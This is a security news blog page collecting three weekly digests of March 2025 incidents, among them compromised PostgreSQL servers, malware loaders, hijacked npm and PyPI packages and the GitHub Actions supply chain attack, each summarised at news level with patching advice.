Rose debug info
---------------

Human Factor Blog

how human behavior affects security

Programmer’s Digest #128

03/26/2025-04/02/2025 Over 1,500 PostgreSQL Servers Compromised, New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor And More.

1. Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

An ongoing campaign targets exposed PostgreSQL instances to deploy cryptocurrency miners, with over 1,500 victims reported. The attackers use PG_MEM malware and employ defense evasion techniques like fileless miner payloads and unique binary hashes per target.

The campaign exploits weak PostgreSQL configurations, using the COPY ... FROM PROGRAM command to run arbitrary shell commands. The attackers deploy a Base64-encoded shell script to disable competing miners and drop PG_CORE, along with an obfuscated Golang binary named postmaster. This binary creates a cron job for persistence, elevates privileges, and downloads the XMRig miner. Each compromised machine is assigned a unique mining worker, with the campaign reportedly utilizing over 1,500 machines across multiple wallets.

2. New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth

Cybersecurity researchers have found an updated version of Hijack Loader, a malware loader that introduces new evasion techniques and enhances persistence. The loader now includes call stack spoofing to hide the origin of function calls and performs anti-VM checks to detect sandbox environments. First discovered in 2023, Hijack Loader delivers second-stage payloads like information stealers and bypasses security software.

The latest iteration includes improvements like call stack spoofing to conceal malicious calls, using fabricated stack frames. It also integrates the Heaven’s Gate technique for process injection and delays execution by blocking Avast Antivirus processes. Two new modules, ANTIVM and modTask, enhance detection evasion and establish persistence through scheduled tasks.

Meanwhile, Elastic Security Labs revealed a new malware family, SHELBY, which uses GitHub for command-and-control and data exfiltration. The loader communicates via commits to a private repository, allowing attackers to send commands and access data without leaving detectable traces on disk.

3. Hackers Abuse WordPress MU-Plugins to Hide Malicious Code

Hackers are increasingly using the WordPress mu-plugins directory to run malicious code on every page load, evading detection. This method involves three types of malicious code planted in the ‘wp-content/mu-plugins/’ folder, which runs automatically without activation from the admin dashboard.

Mu-plugins can be used for legitimate functions, but their automatic execution makes them ideal for stealthy attacks. Sucuri identified three payloads:

  1. redirect.php – Redirects users to a fake browser update site to download malware.
  2. index.php – A webshell that fetches and executes PHP code remotely.
  3. custom-js-loader.php – Injects malicious JavaScript to hijack images and links.

These attacks can steal credentials, harm a site’s reputation, and install malware. To prevent infections, Sucuri advises updating plugins, disabling unnecessary ones, and using strong passwords with multi-factor authentication.

4. Multiple npm Crypto Packages Hijacked

Sonatype has uncovered multiple hijacked npm cryptocurrency packages designed to steal sensitive information like API keys and SSH keys. These packages, some of which have been on npm for up to 9 years, were recently updated with malicious, obfuscated scripts.

The hijacked packages, tracked as sonatype-2025-000924, include scripts that exfiltrate sensitive data to a remote server after installation. Notably, some packages had not been updated in years, like “bnb-javascript-sdk-nobroadcast,” which received a malicious release.

Sonatype researchers suspect the hijacks may be the result of compromised npm maintainer accounts, possibly due to credential stuffing or expired domain takeovers. This incident highlights the importance of securing developer accounts with two-factor authentication (2FA) and improving supply chain security practices. Developers must remain vigilant in monitoring third-party software registries to mitigate risks associated with malicious updates in open-source packages.

5. RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

CISA has uncovered a new malware called RESURGE, exploiting a now-patched vulnerability in Ivanti Connect Secure (ICS) appliances. RESURGE, which includes features of the SPAWNCHIMERA malware, has distinct commands altering its behavior and capabilities such as a rootkit, dropper, backdoor, proxy, and tunneler. The security flaw (CVE-2025-0282) affects several Ivanti products and could allow remote code execution. It has been weaponized to deliver the SPAWN ecosystem, linked to a China-based espionage group, UNC5337. SPAWNCHIMERA, the previous malware variant, was observed being used to patch this vulnerability.

RESURGE includes features like web shell deployment, credential harvesting, and manipulation of integrity checks. CISA also discovered two other malicious artifacts on compromised ICS devices. Organizations are urged to patch Ivanti systems, reset credentials, and monitor accounts for anomalous activity.

1 d   digest   programmers'

Programmer’s Digest #127

03/19/2025-03/26/2025 Update Next.js, Critical Ingress NGINX Controller Vulnerability, Authentication Bypass in VMware Windows Tools And More.

1. Warning For Developers, Web Admins: Update Next.js to Prevent Exploit

Developers using Next.js should install a security update to fix a critical vulnerability, CVE-2025-29927, which allows authorization bypass if the “middleware” function is enabled. This poses a serious risk for applications relying on middleware for security checks. This vulnerability allows a trivial authentication bypass. Attackers could exploit it by logging in as regular users and tampering with security controls, potentially gaining admin access. All Next.js versions from 11.1.4 onward are affected. Users should upgrade to 15.2.3 (for 15.x) or 14.2.25 (for 14.x).

Applications hosted on Vercel or Netlify, or those not using middleware, are unaffected. If patching isn’t possible, Vercel advises blocking external requests with the x-middleware-subrequest header. Ullrich noted that similar vulnerabilities have appeared in other commercial tools.

2. Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

Five critical vulnerabilities, dubbed IngressNightmare, have been found in the Ingress NGINX Controller for Kubernetes, exposing over 6,500 clusters to unauthenticated remote code execution. Assigned a CVSS score of 9.8, these flaws allow attackers to access all secrets across namespaces, potentially leading to cluster takeover. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, CVE-2025-1974) exploit the admission controller, which lacks authentication and is accessible over the network. Attackers can inject arbitrary NGINX configurations via malicious ingress objects, executing code within the controller pod.

Cloud security firm Wiz warns that 43% of cloud environments are at risk. The Kubernetes Security Response Committee has patched the flaws in Ingress NGINX Controller versions 1.12.1, 1.11.5, and 1.10.7.

Admins should update immediately and ensure the admission webhook endpoint is not publicly exposed to mitigate risks.

3. Broadcom Warns of Authentication Bypass in VMware Windows Tools

Broadcom released security updates to fix a high-severity authentication bypass flaw (CVE-2025-22230) in VMware Tools for Windows. This vulnerability, caused by improper access control, allows local attackers with low privileges to gain high privileges on vulnerable VMs. “A malicious actor with non-administrative privileges on a Windows guest VM may perform certain high-privilege operations,” VMware warned in a security advisory.

Earlier this month, Broadcom patched three VMware zero-days (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226) exploited in attacks. Shortly after, over 37,000 VMware ESXi instances were found exposed to CVE-2025-22224.

4. Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories’ CI/CD Secrets Exposed

A supply chain attack on the GitHub Action “tj-actions/changed-files” initially targeted Coinbase’s open-source project, agentkit, before expanding. The attacker compromised the GitHub Action to leak repository secrets, earning CVE-2025-30066 (CVSS 8.6).

Endor Labs found 218 repositories exposed secrets, including credentials for DockerHub, npm, AWS, and GitHub tokens. Another compromised GitHub Action, “reviewdog/action-setup” (CVE-2025-30154), enabled attackers to modify “tj-actions/changed-files,” affecting all dependent repositories.

The attacker used obfuscation techniques, including dangling commits and temporary accounts, to evade detection. While GitHub found no evidence of a platform compromise, the attack suggests deep knowledge of CI/CD security.
Initially targeting Coinbase, the attacker may have shifted to a broader campaign after Coinbase mitigated the threat. The motive remains unclear but is likely financial, possibly involving cryptocurrency theft. Coinbase has since remediated the attack.

5. CISA Adds NAKIVO Vulnerability to KEV Catalog Amid Active Exploitation

CISA has added a high-severity flaw in NAKIVO Backup & Replication (CVE-2024-48248, CVSS 8.6) to its Known Exploited Vulnerabilities (KEV) catalog. The path traversal bug allows unauthenticated attackers to read sensitive files, including stored credentials. It affects versions before 10.11.3.86570 and was patched in v11.0.0.88174.

Two other vulnerabilities were also added:

  • CVE-2025-1316 (CVSS 9.3): A remote code execution flaw in Edimax IC-7100 IP cameras, exploited to deploy Mirai botnet variants. (Unpatched)
  • CVE-2017-12637 (CVSS 7.5): A directory traversal flaw in SAP NetWeaver AS Java, used to steal sensitive SAP system files, potentially leading to full system compromise.

Federal agencies must apply mitigations by April 9, 2025. SAP cybersecurity firm Onapsis reports active exploitation of CVE-2017-12637, with attackers leveraging it to extract privileged credentials and gain full access to vulnerable SAP applications.

8 d   digest   programmers'

Programmer’s Digest #126

03/12/2025-03/19/2025 Critical mySCADA myPRO Flaws, GitHub Action Hack, Malicious PyPI Packages Stole Cloud Tokens And More.

1. Critical mySCADA myPRO Flaws Could Let Attackers Take Over Industrial Control Systems

Cybersecurity researchers have disclosed two critical flaws in mySCADA myPRO, a SCADA system used in operational technology (OT) environments. These vulnerabilities could allow attackers to take control of affected systems.

Swiss security firm PRODAFT warns that exploitation could lead to severe operational disruptions and financial losses. Both flaws, rated 9.3 on the CVSS v4 scale, involve OS command injection via specially crafted POST requests:

  • CVE-2025-20014 – Exploits a version parameter.
  • CVE-2025-20061 – Exploits an email parameter.

Successful attacks could enable arbitrary code execution. The flaws stem from improper input sanitization and have been patched in:

  • mySCADA PRO Manager 1.3
  • mySCADA PRO Runtime 9.2.1

PRODAFT stresses the need for stronger SCADA security. Organizations should apply patches, isolate SCADA from IT networks, enforce strong authentication, and monitor for threats.

2. GitHub Action Hack Likely Led to Another in Cascading Supply Chain Attack

A cascading supply chain attack started with the compromise of reviewdog/action-setup@v1, leading to the breach of tj-actions/changed-files, exposing CI/CD secrets.Attackers modified tj-actions/changed-files, writing secrets to workflow logs in 23,000 repositories. If public, these logs could have leaked critical credentials.

Wiz researchers believe the root cause was reviewdog/action-setup, which was compromised to inject base64-encoded payloads dumping secrets to logs. Since tj-actions/eslint-changed-files used this action, attackers likely stole its Personal Access Token (PAT).

Other potentially affected actions:

  • reviewdog/action-shellcheck
  • reviewdog/action-composite-template
  • reviewdog/action-staticcheck

Mitigation: Developers should check for reviewdog/action-setup@v1 references, remove affected actions, delete logs, and rotate secrets. To prevent future breaches, pin actions to commit hashes and use GitHub’s allow-listing feature.

Swift action is needed to minimize risk from leaked CI/CD secrets.

3. Malicious PyPI Packages Stole Cloud Tokens—Over 14,100 Downloads Before Removal

Cybersecurity researchers warn of a malicious campaign targeting PyPI users with fake “time”-themed packages designed to steal cloud access tokens.

ReversingLabs identified 20 such packages, downloaded over 14,100 times, including acloud-client (5,496 downloads) and snapshot-photo (2,448 downloads). These packages either upload stolen data or impersonate cloud service clients (AWS, Alibaba Cloud, Tencent Cloud) to exfiltrate secrets.

Three packages—acloud-client, enumer-iam, and tcloud-python-test—were dependencies of accesskey_tools, a GitHub project with 519 stars and 42 forks, suggesting a widespread impact. The malicious packages have now been removed from PyPI.

Meanwhile, Fortinet FortiGuard Labs found thousands of suspicious PyPI and npm packages embedding malicious install scripts or communicating with command-and-control (C&C) servers.

Mitigation: Developers should monitor dependencies for suspicious URLs and scrutinize package sources to prevent data theft and malware infections.

4. OBSCURE#BAT Malware Uses Fake CAPTCHA Pages to Deploy Rootkit r77 and Evade Detection

A new malware campaign, OBSCURE#BAT, uses social engineering to deploy the r77 rootkit, enabling persistence and evasion on infected systems. The attackers remain unidentified. The rootkit hides files, registry keys, and tasks with a specific prefix. It spreads through fake software downloads and CAPTCHA scams, mainly targeting users in the U.S., Canada, Germany, and the U.K.

Initial infection methods include:

  • Fake Cloudflare CAPTCHA pages (ClickFix strategy)
  • Malware disguised as legitimate tools like Tor Browser and VoIP software

Once executed, a batch script runs PowerShell commands to modify the Windows Registry, set up scheduled tasks, and install a stealthy rootkit (ACPIx86.sys). The malware also patches AMSI to bypass antivirus detection and monitors clipboard activity for potential data theft.

OBSCURE#BAT demonstrates advanced evasion techniques, making detection difficult. Security researchers warn that its persistence mechanisms ensure it survives reboots and injects into critical processes like winlogon.exe.

15 d   digest   programmers'
Earlier Ctrl + ↓